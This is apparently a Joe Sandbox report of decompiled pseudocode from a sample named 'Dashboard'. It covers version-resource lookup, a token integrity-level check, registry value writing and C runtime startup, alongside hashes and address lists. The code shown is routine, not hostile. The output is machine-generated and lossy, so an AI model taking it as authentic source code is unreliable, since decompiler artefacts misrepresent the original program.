                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Compare$Free$H_prolog3
                                                                                                                    • String ID: W
                                                                                                                    • API String ID: 1418015357-655174618
                                                                                                                    • Opcode ID: e39bde786cc5e509e910243a1f7bee8366021e46218f773fdf9285fc12366a50
                                                                                                                    • Instruction ID: 47f769c8fea87ae1cb678e69320621dc2ceae8e0eda54b62641d1dfb7c34f609
                                                                                                                    • Opcode Fuzzy Hash: e39bde786cc5e509e910243a1f7bee8366021e46218f773fdf9285fc12366a50
                                                                                                                    • Instruction Fuzzy Hash: 68217C7190029AEBCF228F99CC84DAFBFB5FF49310F104429F694A71A4C7798A54CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E01006FF1(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				short _v168;
                                                                                                                    				void* _v172;
                                                                                                                    				int _v176;
                                                                                                                    				char _v432;
                                                                                                                    				void* _v436;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				signed int _t20;
                                                                                                                    				void* _t22;
                                                                                                                    				void* _t30;
                                                                                                                    				void* _t35;
                                                                                                                    				signed int _t38;
                                                                                                                    				void* _t43;
                                                                                                                    				intOrPtr _t44;
                                                                                                                    				void* _t47;
                                                                                                                    				signed int _t48;
                                                                                                                    				void* _t49;
                                                                                                                    
                                                                                                                    				_t43 = __edx;
                                                                                                                    				_t20 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t20 ^ _t48;
                                                                                                                    				_t35 = __ecx;
                                                                                                                    				_t44 = _a4;
                                                                                                                    				if( *(__ecx + 0xc) == 0) {
                                                                                                                    					_t22 = E01006FC7( &_v436, "040904B0");
                                                                                                                    					_t38 = 0x41;
                                                                                                                    					_t47 = _t22;
                                                                                                                    					memcpy(_t49 - 0x104, _t47, _t38 << 2);
                                                                                                                    					_t44 = _t47 + _t38 + _t38;
                                                                                                                    					__imp__swprintf_s( &_v168, 0x50, L"\\StringFileInfo\\%s\\%s", _t44);
                                                                                                                    					if(_v436 !=  &_v432) {
                                                                                                                    						free(_v436);
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					__imp__swprintf_s( &_v168, 0x50, L"\\StringFileInfo\\%04X%04X\\%s",  *(__ecx + 0xc) & 0x0000ffff,  *(__ecx + 0xe) & 0x0000ffff, _t44);
                                                                                                                    				}
                                                                                                                    				if(VerQueryValueW( *(_t35 + 4),  &_v168,  &_v172,  &_v176) == 0) {
                                                                                                                    					_t30 = 0;
                                                                                                                    				} else {
                                                                                                                    					_t30 = _v172;
                                                                                                                    					if(_v176 <= 0) {
                                                                                                                    						_t30 = 0x100185c;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E010087FB(_t30, _t35, _v8 ^ _t48, _t43, _t44, _t47);
                                                                                                                    			}






















                                                                                                                    0x01006ff1
                                                                                                                    0x01006ffc
                                                                                                                    0x01007003
                                                                                                                    0x01007008
                                                                                                                    0x0100700f
                                                                                                                    0x01007012
                                                                                                                    0x01007043
                                                                                                                    0x01007051
                                                                                                                    0x01007054
                                                                                                                    0x01007064
                                                                                                                    0x01007064
                                                                                                                    0x01007066
                                                                                                                    0x0100707e
                                                                                                                    0x01007086
                                                                                                                    0x0100708c
                                                                                                                    0x01007014
                                                                                                                    0x0100702d
                                                                                                                    0x01007033
                                                                                                                    0x010070ac
                                                                                                                    0x010070c4
                                                                                                                    0x010070ae
                                                                                                                    0x010070b5
                                                                                                                    0x010070bb
                                                                                                                    0x010070bd
                                                                                                                    0x010070bd
                                                                                                                    0x010070bb
                                                                                                                    0x010070d4

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: swprintf_s$QueryValuefree
                                                                                                                    • String ID: 040904B0$\StringFileInfo\%04X%04X\%s$\StringFileInfo\%s\%s
                                                                                                                    • API String ID: 58640916-2735271439
                                                                                                                    • Opcode ID: 10e1db9037010f63f168c616480a7b0505c72547c66df70d44e3b384dd55806d
                                                                                                                    • Instruction ID: 9121654ffcc31185a179aebdb9a7bae6dd74d00202f9eb81be755d9591a0e984
                                                                                                                    • Opcode Fuzzy Hash: 10e1db9037010f63f168c616480a7b0505c72547c66df70d44e3b384dd55806d
                                                                                                                    • Instruction Fuzzy Hash: 93214175600218EBEB22DB15DC41FEA77B8EB49701F0441E6B6C9EA0C0DB75EA488F61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E01007241(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t32;
                                                                                                                    				void* _t33;
                                                                                                                    				void* _t40;
                                                                                                                    				void* _t51;
                                                                                                                    				void* _t52;
                                                                                                                    
                                                                                                                    				_push(0x10);
                                                                                                                    				E0100880F(E01015BA8, __ebx, __edi, __esi);
                                                                                                                    				_t40 = 0;
                                                                                                                    				 *((intOrPtr*)(_t52 - 0x1c)) = 0;
                                                                                                                    				E01005BFD( *((intOrPtr*)(_t52 + 8)));
                                                                                                                    				 *((intOrPtr*)(_t52 - 0x1c)) = 1;
                                                                                                                    				 *((intOrPtr*)(_t52 - 4)) = 1;
                                                                                                                    				 *(_t52 - 0x18) = 0;
                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8, _t52 - 0x18) != 0) {
                                                                                                                    					_t32 =  *(_t52 - 0x18);
                                                                                                                    					 *(_t52 - 0x14) = _t32;
                                                                                                                    					_t33 = GetTokenInformation(_t32, 0xa, 0, 0, _t52 - 0x10);
                                                                                                                    					_push( *(_t52 - 0x10));
                                                                                                                    					L010082FB();
                                                                                                                    					_t51 = _t33;
                                                                                                                    					if(_t51 != 0) {
                                                                                                                    						GetTokenInformation( *(_t52 - 0x14), 0xa, _t51,  *(_t52 - 0x10), _t52 - 0x10);
                                                                                                                    						E01006357( *((intOrPtr*)(_t52 + 8)),  *((intOrPtr*)(_t52 + 0xc)));
                                                                                                                    						_push( *((intOrPtr*)(_t51 + 8)));
                                                                                                                    						E01007226( *((intOrPtr*)(_t52 + 8)), L"-%08x%08x",  *((intOrPtr*)(_t51 + 0xc)));
                                                                                                                    						_push(_t51);
                                                                                                                    						L0100871A();
                                                                                                                    						_t40 = 0;
                                                                                                                    					}
                                                                                                                    					if( *(_t52 - 0x14) != _t40) {
                                                                                                                    						E010068DB(_t52 - 0x14);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E010088FB( *((intOrPtr*)(_t52 + 8)));
                                                                                                                    			}








                                                                                                                    0x01007241
                                                                                                                    0x01007248
                                                                                                                    0x0100724d
                                                                                                                    0x0100724f
                                                                                                                    0x01007255
                                                                                                                    0x0100725d
                                                                                                                    0x01007260
                                                                                                                    0x01007269
                                                                                                                    0x0100727b
                                                                                                                    0x0100727d
                                                                                                                    0x0100728f
                                                                                                                    0x01007292
                                                                                                                    0x01007294
                                                                                                                    0x01007297
                                                                                                                    0x0100729c
                                                                                                                    0x010072a1
                                                                                                                    0x010072b0
                                                                                                                    0x010072be
                                                                                                                    0x010072c3
                                                                                                                    0x010072cd
                                                                                                                    0x010072d2
                                                                                                                    0x010072d3
                                                                                                                    0x010072db
                                                                                                                    0x010072db
                                                                                                                    0x010072e0
                                                                                                                    0x010072e5
                                                                                                                    0x010072e5
                                                                                                                    0x010072e0
                                                                                                                    0x010072f2

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01007248
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000010,01007323,?,?,00000004,010076E9,?), ref: 0100726C
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 01007273
                                                                                                                    • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),00000000,00000000,?), ref: 01007292
                                                                                                                    • GetTokenInformation.ADVAPI32(00000002,0000000A(TokenIntegrityLevel),00000000,?,?), ref: 010072B0
                                                                                                                    • ??_V@YAXPAX@Z.MSVCR80 ref: 010072D3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Token$InformationProcess$CurrentH_prolog3Open
                                                                                                                    • String ID: -%08x%08x
                                                                                                                    • API String ID: 3011079919-1460627869
                                                                                                                    • Opcode ID: 094dca7fcef6272655e9c9468c71074463a0339e4279d3ced7844b622b4b0cbd
                                                                                                                    • Instruction ID: 14013fa25340ebc3f15318e562f0247be2727f88028aed6a1f8695add1c8e3b5
                                                                                                                    • Opcode Fuzzy Hash: 094dca7fcef6272655e9c9468c71074463a0339e4279d3ced7844b622b4b0cbd
                                                                                                                    • Instruction Fuzzy Hash: 14111A71D0021AAFEB52EFA4CC84DEFBBB9FF54300F108429F685A7190D6359A41CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0100F09B(intOrPtr __ecx, signed int __edx, void* __eflags, int _a4, short* _a8, intOrPtr _a12) {
                                                                                                                    				int _v8;
                                                                                                                    				char _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				short _v8216;
                                                                                                                    				char _v8472;
                                                                                                                    				int _v8476;
                                                                                                                    				signed int _v8480;
                                                                                                                    				short* _v8484;
                                                                                                                    				int _v8488;
                                                                                                                    				int _v8492;
                                                                                                                    				intOrPtr _v8496;
                                                                                                                    				intOrPtr _v8500;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				signed int _t74;
                                                                                                                    				signed int _t75;
                                                                                                                    				WCHAR* _t87;
                                                                                                                    				WCHAR* _t90;
                                                                                                                    				signed char _t92;
                                                                                                                    				signed int _t103;
                                                                                                                    				signed char _t105;
                                                                                                                    				WCHAR* _t110;
                                                                                                                    				int _t118;
                                                                                                                    				WCHAR* _t125;
                                                                                                                    				intOrPtr _t128;
                                                                                                                    				void* _t129;
                                                                                                                    				int _t130;
                                                                                                                    				int _t132;
                                                                                                                    				void* _t146;
                                                                                                                    				signed int _t154;
                                                                                                                    				signed int _t155;
                                                                                                                    				void* _t160;
                                                                                                                    				signed int _t161;
                                                                                                                    				WCHAR* _t162;
                                                                                                                    				void* _t166;
                                                                                                                    				WCHAR* _t167;
                                                                                                                    				WCHAR* _t169;
                                                                                                                    				signed int _t172;
                                                                                                                    				intOrPtr _t173;
                                                                                                                    				void* _t175;
                                                                                                                    
                                                                                                                    				_t175 = __eflags;
                                                                                                                    				_t155 = __edx;
                                                                                                                    				_push(0xffffffff);
                                                                                                                    				_push(E01016078);
                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E010157F0(0x2120);
                                                                                                                    				_t74 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_t75 = _t74 ^ _t172;
                                                                                                                    				_v24 = _t75;
                                                                                                                    				_push(_t75);
                                                                                                                    				 *[fs:0x0] =  &_v16;
                                                                                                                    				_v20 = _t173;
                                                                                                                    				_t165 = _a4;
                                                                                                                    				_t159 = _a8;
                                                                                                                    				_v8480 = _v8480 & 0x00000000;
                                                                                                                    				_v8496 = _a12;
                                                                                                                    				_t128 = __ecx;
                                                                                                                    				_v8500 = __ecx;
                                                                                                                    				_v8488 = _a4;
                                                                                                                    				_v8484 = _a8;
                                                                                                                    				if(E0100E39F(__ecx, _t175,  &_v8216) < 0) {
                                                                                                                    					L36:
                                                                                                                    					 *[fs:0x0] = _v16;
                                                                                                                    					_pop(_t160);
                                                                                                                    					_pop(_t166);
                                                                                                                    					_pop(_t129);
                                                                                                                    					return E010087FB(_t79, _t129, _v24 ^ _t172, _t155, _t160, _t166);
                                                                                                                    				}
                                                                                                                    				if(E0100E200( &_v8216,  &_v8480) != 0) {
                                                                                                                    					E0100E376(_t128, __eflags);
                                                                                                                    					_t79 = E0100E39F(_t128, __eflags,  &_v8216);
                                                                                                                    					_t130 = 0;
                                                                                                                    					__eflags = _t79;
                                                                                                                    					if(_t79 < 0) {
                                                                                                                    						goto L36;
                                                                                                                    					}
                                                                                                                    					_t87 = (_v8480 & 0x0000ffff) - 8;
                                                                                                                    					__eflags = _t87;
                                                                                                                    					if(_t87 == 0) {
                                                                                                                    						_t167 = E0100C684(_t165, _t159,  &_v8216, 1);
                                                                                                                    						L32:
                                                                                                                    						_t130 = 0;
                                                                                                                    						__eflags = _t167;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							L34:
                                                                                                                    							_t79 = E0100E39F(_v8500, __eflags, _v8496);
                                                                                                                    							__eflags = _t79 - _t130;
                                                                                                                    							if(_t79 >= _t130) {
                                                                                                                    								_t79 = 0;
                                                                                                                    								__eflags = 0;
                                                                                                                    							}
                                                                                                                    							goto L36;
                                                                                                                    						}
                                                                                                                    						_t79 = E0100DF9B(_t167);
                                                                                                                    						goto L36;
                                                                                                                    					}
                                                                                                                    					_t90 = _t87 - 9;
                                                                                                                    					__eflags = _t90;
                                                                                                                    					if(_t90 == 0) {
                                                                                                                    						_t92 = lstrlenW( &_v8216);
                                                                                                                    						__eflags = _t92 & 0x00000001;
                                                                                                                    						_v8480 = _t92;
                                                                                                                    						if((_t92 & 0x00000001) == 0) {
                                                                                                                    							_v8476 = _v8476 & 0x00000000;
                                                                                                                    							asm("cdq");
                                                                                                                    							_t132 = _t92 - _t155 >> 1;
                                                                                                                    							_v8492 = _t132;
                                                                                                                    							_v8 = 3;
                                                                                                                    							_v8 = 4;
                                                                                                                    							E0100EC51( &_v8476, _t132);
                                                                                                                    							_t161 = 0;
                                                                                                                    							__eflags = _v8476;
                                                                                                                    							if(_v8476 != 0) {
                                                                                                                    								memset(_v8476, 0, _t132);
                                                                                                                    								__eflags = _v8480;
                                                                                                                    								if(_v8480 <= 0) {
                                                                                                                    									L29:
                                                                                                                    									_t167 = RegSetValueExW( *_v8488, _v8484, 0, 3, _v8476, _t132);
                                                                                                                    									__eflags = _v8476 -  &_v8472;
                                                                                                                    									if(_v8476 !=  &_v8472) {
                                                                                                                    										E0100E678( &_v8476);
                                                                                                                    									}
                                                                                                                    									goto L32;
                                                                                                                    								} else {
                                                                                                                    									goto L28;
                                                                                                                    								}
                                                                                                                    								do {
                                                                                                                    									L28:
                                                                                                                    									asm("cdq");
                                                                                                                    									_t103 = _t161 - _t155 >> 1;
                                                                                                                    									_t105 = E0100E29D( *(_t172 + _t161 * 2 - 0x2014) & 0x0000ffff);
                                                                                                                    									_t155 = (_t161 & 0x00000001) << 2;
                                                                                                                    									_t146 = 4;
                                                                                                                    									 *(_t103 + _v8476) =  *(_t103 + _v8476) | _t105 << _t146 - _t155;
                                                                                                                    									_t161 = _t161 + 1;
                                                                                                                    									__eflags = _t161 - _v8480;
                                                                                                                    								} while (_t161 < _v8480);
                                                                                                                    								goto L29;
                                                                                                                    							} else {
                                                                                                                    								__eflags =  &_v8472;
                                                                                                                    								if( &_v8472 != 0) {
                                                                                                                    									E0100E678( &_v8476);
                                                                                                                    								}
                                                                                                                    								goto L22;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L22:
                                                                                                                    						_t79 = 0x80004005;
                                                                                                                    						goto L36;
                                                                                                                    					}
                                                                                                                    					_t110 = _t90;
                                                                                                                    					__eflags = _t110;
                                                                                                                    					if(_t110 == 0) {
                                                                                                                    						 *0x101a294();
                                                                                                                    						_v8488 = 0;
                                                                                                                    						__imp__#277( &_v8216, 0, 0,  &_v8484);
                                                                                                                    						_t167 = E0100C661(_t165, _t159, _v8484);
                                                                                                                    						E0100E587(_t114,  &_v8488);
                                                                                                                    						goto L32;
                                                                                                                    					}
                                                                                                                    					__eflags = _t110 - 0x3ff5;
                                                                                                                    					if(__eflags != 0) {
                                                                                                                    						goto L34;
                                                                                                                    					}
                                                                                                                    					_t118 = lstrlenW( &_v8216);
                                                                                                                    					_v8476 = 0;
                                                                                                                    					_v8 = 0;
                                                                                                                    					_v8 = 1;
                                                                                                                    					E0100EC2D( &_v8476, _t118 + 2);
                                                                                                                    					_t169 = _v8476;
                                                                                                                    					__eflags = _t169;
                                                                                                                    					if(_t169 == 0) {
                                                                                                                    						_t167 = 0xe;
                                                                                                                    						L18:
                                                                                                                    						__eflags = _v8476 -  &_v8472;
                                                                                                                    						if(_v8476 !=  &_v8472) {
                                                                                                                    							E0100E678( &_v8476);
                                                                                                                    						}
                                                                                                                    						goto L32;
                                                                                                                    					}
                                                                                                                    					__eflags = _v8216;
                                                                                                                    					_t162 =  &_v8216;
                                                                                                                    					if(_v8216 == 0) {
                                                                                                                    						L16:
                                                                                                                    						 *_t169 =  *_t169 & 0x00000000;
                                                                                                                    						_t169[1] = _t169[1] & 0x00000000;
                                                                                                                    						_t167 = E0100E095(_v8488, _v8484, _v8476);
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						do {
                                                                                                                    							_t125 = CharNextW(_t162);
                                                                                                                    							_t154 =  *_t162 & 0x0000ffff;
                                                                                                                    							__eflags = _t154 - 0x5c;
                                                                                                                    							if(_t154 != 0x5c) {
                                                                                                                    								L14:
                                                                                                                    								 *_t169 = _t154;
                                                                                                                    								_t169 =  &(_t169[1]);
                                                                                                                    								_t162 =  &(_t162[1]);
                                                                                                                    								__eflags = _t162;
                                                                                                                    								goto L15;
                                                                                                                    							}
                                                                                                                    							__eflags =  *_t125 - 0x30;
                                                                                                                    							if( *_t125 != 0x30) {
                                                                                                                    								goto L14;
                                                                                                                    							}
                                                                                                                    							 *_t169 =  *_t169 & 0x00000000;
                                                                                                                    							_t169 =  &(_t169[1]);
                                                                                                                    							_t162 = CharNextW(_t125);
                                                                                                                    							L15:
                                                                                                                    							__eflags =  *_t162;
                                                                                                                    						} while ( *_t162 != 0);
                                                                                                                    						goto L16;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t79 = 0x80020009;
                                                                                                                    					goto L36;
                                                                                                                    				}
                                                                                                                    			}













































                                                                                                                    0x0100f09b
                                                                                                                    0x0100f09b
                                                                                                                    0x0100f0a0
                                                                                                                    0x0100f0a2
                                                                                                                    0x0100f0ad
                                                                                                                    0x0100f0ae
                                                                                                                    0x0100f0b4
                                                                                                                    0x0100f0b9
                                                                                                                    0x0100f0be
                                                                                                                    0x0100f0c0
                                                                                                                    0x0100f0c6
                                                                                                                    0x0100f0ca
                                                                                                                    0x0100f0d0
                                                                                                                    0x0100f0d6
                                                                                                                    0x0100f0d9
                                                                                                                    0x0100f0dc
                                                                                                                    0x0100f0e3
                                                                                                                    0x0100f0ef
                                                                                                                    0x0100f0f2
                                                                                                                    0x0100f0f8
                                                                                                                    0x0100f0fe
                                                                                                                    0x0100f10b
                                                                                                                    0x0100f3c2
                                                                                                                    0x0100f3c5
                                                                                                                    0x0100f3cd
                                                                                                                    0x0100f3ce
                                                                                                                    0x0100f3cf
                                                                                                                    0x0100f3db
                                                                                                                    0x0100f3db
                                                                                                                    0x0100f126
                                                                                                                    0x0100f134
                                                                                                                    0x0100f142
                                                                                                                    0x0100f147
                                                                                                                    0x0100f149
                                                                                                                    0x0100f14b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f158
                                                                                                                    0x0100f158
                                                                                                                    0x0100f15b
                                                                                                                    0x0100f39b
                                                                                                                    0x0100f39d
                                                                                                                    0x0100f39d
                                                                                                                    0x0100f39f
                                                                                                                    0x0100f3a1
                                                                                                                    0x0100f3ab
                                                                                                                    0x0100f3b7
                                                                                                                    0x0100f3bc
                                                                                                                    0x0100f3be
                                                                                                                    0x0100f3c0
                                                                                                                    0x0100f3c0
                                                                                                                    0x0100f3c0
                                                                                                                    0x00000000
                                                                                                                    0x0100f3be
                                                                                                                    0x0100f3a4
                                                                                                                    0x00000000
                                                                                                                    0x0100f3a4
                                                                                                                    0x0100f161
                                                                                                                    0x0100f161
                                                                                                                    0x0100f164
                                                                                                                    0x0100f289
                                                                                                                    0x0100f28f
                                                                                                                    0x0100f291
                                                                                                                    0x0100f297
                                                                                                                    0x0100f2a3
                                                                                                                    0x0100f2aa
                                                                                                                    0x0100f2af
                                                                                                                    0x0100f2b1
                                                                                                                    0x0100f2b7
                                                                                                                    0x0100f2c5
                                                                                                                    0x0100f2c9
                                                                                                                    0x0100f2dc
                                                                                                                    0x0100f2de
                                                                                                                    0x0100f2e4
                                                                                                                    0x0100f305
                                                                                                                    0x0100f30d
                                                                                                                    0x0100f313
                                                                                                                    0x0100f34d
                                                                                                                    0x0100f36d
                                                                                                                    0x0100f375
                                                                                                                    0x0100f37b
                                                                                                                    0x0100f383
                                                                                                                    0x0100f383
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f315
                                                                                                                    0x0100f315
                                                                                                                    0x0100f31d
                                                                                                                    0x0100f320
                                                                                                                    0x0100f32e
                                                                                                                    0x0100f338
                                                                                                                    0x0100f33d
                                                                                                                    0x0100f342
                                                                                                                    0x0100f344
                                                                                                                    0x0100f345
                                                                                                                    0x0100f345
                                                                                                                    0x00000000
                                                                                                                    0x0100f2e6
                                                                                                                    0x0100f2ec
                                                                                                                    0x0100f2ee
                                                                                                                    0x0100f2f6
                                                                                                                    0x0100f2f6
                                                                                                                    0x00000000
                                                                                                                    0x0100f2ee
                                                                                                                    0x0100f2e4
                                                                                                                    0x0100f299
                                                                                                                    0x0100f299
                                                                                                                    0x00000000
                                                                                                                    0x0100f299
                                                                                                                    0x0100f16b
                                                                                                                    0x0100f16b
                                                                                                                    0x0100f16c
                                                                                                                    0x0100f240
                                                                                                                    0x0100f256
                                                                                                                    0x0100f25c
                                                                                                                    0x0100f276
                                                                                                                    0x0100f278
                                                                                                                    0x00000000
                                                                                                                    0x0100f278
                                                                                                                    0x0100f172
                                                                                                                    0x0100f177
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f184
                                                                                                                    0x0100f18c
                                                                                                                    0x0100f192
                                                                                                                    0x0100f19c
                                                                                                                    0x0100f1a0
                                                                                                                    0x0100f1a5
                                                                                                                    0x0100f1ab
                                                                                                                    0x0100f1ad
                                                                                                                    0x0100f21d
                                                                                                                    0x0100f21e
                                                                                                                    0x0100f224
                                                                                                                    0x0100f22a
                                                                                                                    0x0100f236
                                                                                                                    0x0100f236
                                                                                                                    0x00000000
                                                                                                                    0x0100f22a
                                                                                                                    0x0100f1af
                                                                                                                    0x0100f1b7
                                                                                                                    0x0100f1bd
                                                                                                                    0x0100f1f7
                                                                                                                    0x0100f1f7
                                                                                                                    0x0100f1fb
                                                                                                                    0x0100f217
                                                                                                                    0x00000000
                                                                                                                    0x0100f1bf
                                                                                                                    0x0100f1c5
                                                                                                                    0x0100f1c6
                                                                                                                    0x0100f1c8
                                                                                                                    0x0100f1cb
                                                                                                                    0x0100f1cf
                                                                                                                    0x0100f1ea
                                                                                                                    0x0100f1ea
                                                                                                                    0x0100f1ee
                                                                                                                    0x0100f1f0
                                                                                                                    0x0100f1f0
                                                                                                                    0x00000000
                                                                                                                    0x0100f1f0
                                                                                                                    0x0100f1d1
                                                                                                                    0x0100f1d5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f1d7
                                                                                                                    0x0100f1dd
                                                                                                                    0x0100f1e0
                                                                                                                    0x0100f1f1
                                                                                                                    0x0100f1f1
                                                                                                                    0x0100f1f1
                                                                                                                    0x00000000
                                                                                                                    0x0100f1c5
                                                                                                                    0x0100f128
                                                                                                                    0x0100f128
                                                                                                                    0x00000000
                                                                                                                    0x0100f128

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0100E200: lstrcmpiW.KERNEL32(?), ref: 0100E26E
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0100F184
                                                                                                                    • CharNextW.USER32(00000000), ref: 0100F1C6
                                                                                                                    • CharNextW.USER32(00000000), ref: 0100F1DE
                                                                                                                    • HRESULT_FROM_WIN32.COMSUPP ref: 0100F3A4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$lstrcmpilstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1051761657-0
                                                                                                                    • Opcode ID: f007392dcc0b97368795c7c681e3556136bea518257d0dca415f9f8329e6f00c
                                                                                                                    • Instruction ID: e78cf0f7e787b2a388ba4b1afe683e8f8685b0032c1eda716b136b0a6e7556b7
                                                                                                                    • Opcode Fuzzy Hash: f007392dcc0b97368795c7c681e3556136bea518257d0dca415f9f8329e6f00c
                                                                                                                    • Instruction Fuzzy Hash: 1491827190021ADBEB36DF64CC49AEDB7B4EB68310F0044EAE789A3180D7749E95DF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E0100853A(void* __eax) {
                                                                                                                    				intOrPtr _t10;
                                                                                                                    				signed int _t11;
                                                                                                                    				int _t12;
                                                                                                                    				intOrPtr* _t13;
                                                                                                                    				intOrPtr* _t14;
                                                                                                                    				void* _t18;
                                                                                                                    				intOrPtr _t23;
                                                                                                                    				intOrPtr _t24;
                                                                                                                    				signed int _t27;
                                                                                                                    				signed int _t28;
                                                                                                                    				void* _t31;
                                                                                                                    
                                                                                                                    				if(_t31 == 1) {
                                                                                                                    					_t10 =  *0x100003c; // 0xe8
                                                                                                                    					__eflags =  *((intOrPtr*)(_t10 + 0x1000000)) - 0x4550;
                                                                                                                    					if( *((intOrPtr*)(_t10 + 0x1000000)) != 0x4550) {
                                                                                                                    						goto L1;
                                                                                                                    					} else {
                                                                                                                    						_t2 = _t10 + 0x1000018; // 0x8010b
                                                                                                                    						_t27 =  *_t2 & 0x0000ffff;
                                                                                                                    						__eflags = _t27 - 0x10b;
                                                                                                                    						if(_t27 == 0x10b) {
                                                                                                                    							__eflags =  *((intOrPtr*)(_t10 + 0x1000074)) - 0xe;
                                                                                                                    							if( *((intOrPtr*)(_t10 + 0x1000074)) <= 0xe) {
                                                                                                                    								goto L1;
                                                                                                                    							} else {
                                                                                                                    								_t28 = 0;
                                                                                                                    								__eflags =  *(_t10 + 0x10000e8);
                                                                                                                    								goto L9;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							__eflags = _t27 - 0x20b;
                                                                                                                    							if(_t27 != 0x20b) {
                                                                                                                    								goto L1;
                                                                                                                    							} else {
                                                                                                                    								__eflags =  *((intOrPtr*)(_t10 + 0x1000084)) - 0xe;
                                                                                                                    								if( *((intOrPtr*)(_t10 + 0x1000084)) <= 0xe) {
                                                                                                                    									goto L1;
                                                                                                                    								} else {
                                                                                                                    									_t28 = 0;
                                                                                                                    									__eflags =  *(_t10 + 0x10000f8);
                                                                                                                    									L9:
                                                                                                                    									_t8 = __eflags != 0;
                                                                                                                    									__eflags = _t8;
                                                                                                                    									_t11 = _t28 & 0xffffff00 | _t8;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					L1:
                                                                                                                    					_t11 = 0;
                                                                                                                    				}
                                                                                                                    				 *0x101a618 = _t11;
                                                                                                                    				_t12 = __set_app_type(2);
                                                                                                                    				__imp___encode_pointer(0xffffffff);
                                                                                                                    				 *0x101a9e8 = _t12;
                                                                                                                    				 *0x101a9ec = _t12;
                                                                                                                    				_t13 = __p__fmode();
                                                                                                                    				_t23 =  *0x101a638; // 0x0
                                                                                                                    				 *_t13 = _t23;
                                                                                                                    				_t14 = __p__commode();
                                                                                                                    				_t24 =  *0x101a634; // 0x0
                                                                                                                    				 *_t14 = _t24;
